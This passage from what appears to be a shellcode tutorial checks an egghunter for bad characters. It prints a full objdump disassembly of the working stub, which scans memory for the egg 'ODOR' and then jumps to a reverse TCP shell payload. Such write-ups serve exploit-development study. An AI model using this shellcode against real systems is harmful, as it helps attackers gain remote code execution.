Null-bytes/ CRLF
Let’s check for null-bytes or CR/LF characters which might break the shellcode during runtime.
Checking results in no bad characters being detected. You say prove it! Okay, let’s check with objdump.
$ ../check_badchars.sh egghunt_rev_tcp_initial
[+] Checking ...
[+] Done!
$ Objdump check
It seems there are no initial bad characters in the assembly output, let’s recheck with objdump.
Checking returns also no signs of any initial bad characters.
$ objdump -M intel -d egghunt_rev_tcp_initial
egghunt_rev_tcp_initial: file format elf32-i386
Disassembly of section .text:
08048060 <_start>:
8048060: 31 c9 xor ecx,ecx
8048062: eb 1e jmp 8048082 <begin>
08048064 <page>:
8048064: 66 81 c9 ff 0f or cx,0xfff
08048069 <loop>:
8048069: 41 inc ecx
804806a: 6a 43 push 0x43
804806c: 58 pop eax
804806d: cd 80 int 0x80
804806f: 3c f2 cmp al,0xf2
8048071: 74 f1 je 8048064 <page>
8048073: b8 4f 44 4f 52 mov eax,0x524f444f
8048078: 89 cf mov edi,ecx
804807a: af scas eax,DWORD PTR es:[edi]
804807b: 75 ec jne 8048069 <loop>
804807d: af scas eax,DWORD PTR es:[edi]
804807e: 75 e9 jne 8048069 <loop>
8048080: ff e7 jmp edi
08048082 <begin>:
8048082: e8 e2 ff ff ff call 8048069 <loop>
$